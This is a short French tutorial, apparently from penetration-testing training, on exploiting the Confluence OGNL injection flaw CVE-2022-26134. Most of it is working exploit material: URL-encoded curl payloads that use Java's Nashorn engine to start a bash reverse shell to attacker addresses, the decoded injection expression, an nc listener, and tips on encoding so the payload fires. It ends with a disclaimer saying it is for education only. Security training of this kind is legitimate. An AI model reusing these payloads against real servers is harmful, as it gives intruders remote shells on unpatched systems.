
Exploitation active de l'application Questions for Confluence d'Atlassian CVE-2022-26134
CVE-2022-26134 est une vulnérabilité critique d'exécution de code à distance (RCE) affectant Atlassian Confluence. Cette vulnérabilité permet à des attaquants non authentifiés d'exécuter du code arbitraire en injectant des expressions OGNL dans des points d'accès vulnérables.
La commande CURL suivante démontre l'exploitation active de cette vulnérabilité, en utilisant le moteur Nashorn de Java pour exécuter un reverse shell :
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
En apportant ces modifications, nous devons également prendre en compte l'encodage URL. La chaîne de payload dans la preuve de concept n'est pas complètement encodée en URL. Certains caractères (notamment '.', '-' et '/') ne sont pas encodés. Bien que ce ne soit pas toujours le cas, pour cet exploit, cela s'avère important pour le fonctionnement du payload. Si l'un de ces caractères est encodé, le serveur analysera l'URL différemment, et le payload risque de ne pas s'exécuter. Cela signifie que nous ne pouvons pas appliquer l'encodage URL sur l'ensemble du payload une fois que nous l'avons modifié.
curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
nc -lvnp 1270
Cette documentation est fournie uniquement à des fins éducatives. L'exploitation non autorisée de systèmes est illégale et peut entraîner de graves conséquences. Obtenez toujours une autorisation appropriée avant d'effectuer des évaluations de sécurité.